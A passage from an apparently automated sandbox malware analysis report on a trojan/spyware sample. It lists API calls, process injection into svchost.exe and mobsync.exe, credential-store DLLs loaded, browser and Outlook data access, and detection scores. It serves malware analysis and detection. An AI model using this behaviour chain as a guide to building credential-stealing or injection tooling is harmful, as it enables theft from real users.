                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772FE0 NtCreateFile,2_2_03772FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772FB0 NtResumeThread,2_2_03772FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772FA0 NtQuerySection,2_2_03772FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772F90 NtProtectVirtualMemory,2_2_03772F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772E30 NtWriteVirtualMemory,2_2_03772E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772EE0 NtQueueApcThread,2_2_03772EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772EA0 NtAdjustPrivilegesToken,2_2_03772EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772E80 NtReadVirtualMemory,2_2_03772E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772D30 NtUnmapViewOfSection,2_2_03772D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772D10 NtMapViewOfSection,2_2_03772D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772D00 NtSetInformationFile,2_2_03772D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772DD0 NtDelayExecution,2_2_03772DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772DB0 NtEnumerateKey,2_2_03772DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772C70 NtFreeVirtualMemory,2_2_03772C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772C60 NtCreateKey,2_2_03772C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772C00 NtQueryInformationProcess,2_2_03772C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772CF0 NtOpenProcess,2_2_03772CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772CC0 NtQueryVirtualMemory,2_2_03772CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772CA0 NtQueryInformationToken,2_2_03772CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03773010 NtOpenDirectoryObject,2_2_03773010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03773090 NtSetValueKey,2_2_03773090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037739B0 NtGetContextThread,2_2_037739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03773D70 NtOpenThread,2_2_03773D70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03773D10 NtOpenProcessToken,2_2_03773D10
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_0096A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_0096A1EF
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_00958310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00958310
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_009651BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_009651BD
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_0090E6A00_2_0090E6A0
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_0092D9750_2_0092D975
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_0090FCE00_2_0090FCE0
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_009221C50_2_009221C5
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_009362D20_2_009362D2
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_009803DA0_2_009803DA
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_0093242E0_2_0093242E
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_009225FA0_2_009225FA
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_009166E10_2_009166E1
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_0095E6160_2_0095E616
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_0093878F0_2_0093878F
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_009688890_2_00968889
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_009188080_2_00918808
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_009808570_2_00980857
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_009368440_2_00936844
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_0092CB210_2_0092CB21
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_00936DB60_2_00936DB6
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_00916F9E0_2_00916F9E
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_009130300_2_00913030
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_009231870_2_00923187
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_0092F1D90_2_0092F1D9
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_009012870_2_00901287
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_009214840_2_00921484
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_009155200_2_00915520
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_009276960_2_00927696
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_009157600_2_00915760
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_009219780_2_00921978
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_00939AB50_2_00939AB5
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_00921D900_2_00921D90
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_0092BDA60_2_0092BDA6
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_00987DDB0_2_00987DDB
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_00913FE00_2_00913FE0
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_0090DF000_2_0090DF00
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_012738600_2_01273860
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004183B32_2_004183B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004029292_2_00402929
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004029302_2_00402930
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004012002_2_00401200
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042EAA32_2_0042EAA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FBF32_2_0040FBF3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402DF02_2_00402DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DDF32_2_0040DDF3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004025902_2_00402590
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004165B32_2_004165B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FE132_2_0040FE13
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DF432_2_0040DF43
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DF372_2_0040DF37
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FA3522_2_037FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038003E62_2_038003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E3F02_2_0374E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E02742_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C02C02_2_037C02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C81582_2_037C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038001AA2_2_038001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DA1182_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037301002_2_03730100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F81CC2_2_037F81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F41A22_2_037F41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D20002_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037407702_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037647502_2_03764750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373C7C02_2_0373C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375C6E02_2_0375C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038005912_2_03800591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037405352_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F24462_2_037F2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E44202_2_037E4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EE4F62_2_037EE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FAB402_2_037FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F6BD72_2_037F6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA802_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037569622_2_03756962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0380A9A62_2_0380A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A02_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374A8402_2_0374A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037428402_2_03742840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E8F02_2_0376E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037268B82_2_037268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B4F402_2_037B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03760F302_2_03760F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E2F302_2_037E2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03782F282_2_03782F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374CFE02_2_0374CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03732FC82_2_03732FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BEFA02_2_037BEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740E592_2_03740E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FEE262_2_037FEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FEEDB2_2_037FEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03752E902_2_03752E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FCE932_2_037FCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DCD1F2_2_037DCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374AD002_2_0374AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373ADE02_2_0373ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03758DBF2_2_03758DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740C002_2_03740C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730CF22_2_03730CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0CB52_2_037E0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372D34C2_2_0372D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F132D2_2_037F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0378739A2_2_0378739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E12ED2_2_037E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375B2C02_2_0375B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037452A02_2_037452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372F1722_2_0372F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377516C2_2_0377516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374B1B02_2_0374B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0380B16B2_2_0380B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F70E92_2_037F70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FF0E02_2_037FF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EF0CC2_2_037EF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037470C02_2_037470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FF7B02_2_037FF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037856302_2_03785630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F16CC2_2_037F16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F75712_2_037F7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038095C32_2_038095C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DD5B02_2_037DD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037314602_2_03731460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FF43F2_2_037FF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FFB762_2_037FFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B5BF02_2_037B5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377DBF92_2_0377DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375FB802_2_0375FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B3A6C2_2_037B3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FFA492_2_037FFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F7A462_2_037F7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EDAC62_2_037EDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DDAAC2_2_037DDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03785AA02_2_03785AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E1AA32_2_037E1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037499502_2_03749950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375B9502_2_0375B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D59102_2_037D5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AD8002_2_037AD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037438E02_2_037438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FFF092_2_037FFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03703FD22_2_03703FD2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03703FD52_2_03703FD5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FFFB12_2_037FFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03741F922_2_03741F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03749EB02_2_03749EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F7D732_2_037F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F1D5A2_2_037F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03743D402_2_03743D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375FDC02_2_0375FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B9C322_2_037B9C32
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FFCF22_2_037FFCF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03787E54 appears 111 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 037BF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03775130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0372B970 appears 280 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 037AEA12 appears 86 times
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: String function: 00920AE3 appears 70 times
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: String function: 00907DE1 appears 35 times
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: String function: 00928900 appears 42 times
                Source: Gz2FxKx2cM.exe, 00000000.00000003.1458695094.0000000003973000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Gz2FxKx2cM.exe
                Source: Gz2FxKx2cM.exe, 00000000.00000003.1459168750.0000000003B1D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Gz2FxKx2cM.exe
                Source: Gz2FxKx2cM.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@1/1
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_0096A06A GetLastError,FormatMessageW,0_2_0096A06A
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_009581CB AdjustTokenPrivileges,CloseHandle,0_2_009581CB
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_009587E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_009587E1
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_0096B3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0096B3FB
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_0097EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0097EE0D
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_0096C397 CoInitialize,CoCreateInstance,CoUninitialize,0_2_0096C397
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_00904E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00904E89
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeFile created: C:\Users\user\AppData\Local\Temp\aut8F8B.tmpJump to behavior
                Source: Gz2FxKx2cM.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: mobsync.exe, 00000007.00000003.1863087676.000000000278F000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000007.00000002.1920673882.00000000027B3000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000007.00000002.1920673882.0000000002784000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000007.00000003.1860137612.0000000002763000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000007.00000003.1860256036.0000000002784000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Gz2FxKx2cM.exeReversingLabs: Detection: 71%
                Source: Gz2FxKx2cM.exeVirustotal: Detection: 54%
                Source: unknownProcess created: C:\Users\user\Desktop\Gz2FxKx2cM.exe "C:\Users\user\Desktop\Gz2FxKx2cM.exe"
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Gz2FxKx2cM.exe"
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exeProcess created: C:\Windows\SysWOW64\mobsync.exe "C:\Windows\SysWOW64\mobsync.exe"
                Source: C:\Windows\SysWOW64\mobsync.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Gz2FxKx2cM.exe"Jump to behavior
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exeProcess created: C:\Windows\SysWOW64\mobsync.exe "C:\Windows\SysWOW64\mobsync.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: Gz2FxKx2cM.exeStatic file information: File size 1211904 > 1048576
                Source: Gz2FxKx2cM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: Gz2FxKx2cM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: Gz2FxKx2cM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: Gz2FxKx2cM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Gz2FxKx2cM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: Gz2FxKx2cM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: Gz2FxKx2cM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: mobsync.pdbGCTL source: svchost.exe, 00000002.00000003.1643779067.000000000301B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1643880204.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1643896188.0000000003031000.00000004.00000020.00020000.00000000.sdmp, HFOpYoEqWJkRNv.exe, 00000004.00000002.2675184319.0000000000FA8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: HFOpYoEqWJkRNv.exe, 00000004.00000002.2673839896.000000000085E000.00000002.00000001.01000000.00000005.sdmp, HFOpYoEqWJkRNv.exe, 00000008.00000002.2675044855.000000000085E000.00000002.00000001.01000000.00000005.sdmp
